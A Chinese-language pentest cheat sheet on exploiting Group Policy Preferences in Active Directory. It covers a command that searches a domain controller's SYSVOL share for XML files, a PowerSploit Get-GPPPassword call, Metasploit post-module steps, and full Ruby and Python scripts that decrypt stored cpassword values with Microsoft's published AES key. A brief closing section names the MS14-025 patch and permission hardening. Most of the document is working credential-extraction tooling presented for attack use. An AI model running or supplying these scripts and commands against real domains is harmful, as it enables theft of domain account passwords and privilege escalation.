域渗透-GPP(组策略)利用
组策略偏好
基础
- SYSVOL
SYSVOL是指存储域公共文件服务器副本的共享的文件夹,它们在域中所有的域控制器之间复制。Sysvol文件夹是安装AD时创建的,它用来存放GPO、Script等信息。同时,存放在Sysvol文件夹中的信息,会复制到域中所有DC上
所有的域组策略存储在:
\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\
认证用户(所有域用户或者信任域里的用户)对SYSVOL拥有读权限
- 组策略偏好GPP
映射驱动(Drives.xml)
创建本地用户
数据源(DataSources.xml)
打印机配置(Printers.xml)
创建/更新服务(Services.xml)
计划任务(ScheduledTasks.xml)
更改本地Administrator密码
攻击
dir /s /a \\Sync-DC.Sync.net\SYSVOL\sync.net\*.xml
http://www.91ri.org/14909.html
解密工具
- PowerSploit
https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1
powershell import-modulo .\Get-GPPpassword.ps1;Get-GppPassword
- ruby
ruby gpp.rb
require 'rubygems'
require 'openssl'
require 'base64'
encrypted_data = " v0hX9w3D40aFkfgtPgcz1yWPcjp+BqICihQlATkp50g "
def decrypt(encrypted_data)
padding = "=" * (4 - (encrypted_data.length % 4))
epassword = "#{encrypted_data}#{padding}"
decoded = Base64.decode64(epassword)
key = "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b"
aes = OpenSSL::Cipher::Cipher.new("AES-256-CBC")
aes.decrypt
aes.key = key
plaintext = aes.update(decoded)
plaintext << aes.final
pass = plaintext.unpack('v*').pack('C*') # UNICODE conversion
return pass
end
blah = decrypt(encrypted_data)
puts blah
- msf
msf > use post/windows/gather/credentials/gpp
msf >post(gpp) > sessions
msf >post(gpp) > set SESSION 1
msf> post(gpp) > show options
msf >post(gpp) > run
- python
#!/usr/bin/python
#
# Gpprefdecrypt - Decrypt the password of local users added via Windows 2008 Group Policy Preferences.
#
# This tool decrypts the cpassword attribute value embedded in the Groups.xml file stored in the domain controller's Sysvol share.
#
import sys
from Crypto.Cipher import AES
from base64 import b64decode
if(len(sys.argv) != 2):
print "Usage: gpprefdecrypt.py <cpassword>"
sys.exit(0)
# Init the key
# From MSDN: http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be%28v=PROT.13%29#endNote2
key = """
4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8
f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b
""".replace(" ","").replace("\n","").decode('hex')
# Add padding to the base64 string and decode it
cpassword = sys.argv[1]
cpassword += "=" * ((4 - len(sys.argv[1]) % 4) % 4)
password = b64decode(cpassword)
# Decrypt the password
o = AES.new(key, AES.MODE_CBC).decrypt(password)
# Print it
print o[:-ord(o[-1])].decode('utf16')
防御
- GPP凭证补丁(KB2962486)
2014年5月13日,微软发布了MS14-025的补丁KB2962486,即那个GPP导致的权限提升漏洞。这个补丁需要安装在所有使用了RSAT的系统上,防止管理将密码数据放进GPP里 - 可以直接设置xml的读取权限,从而防止恶意的读取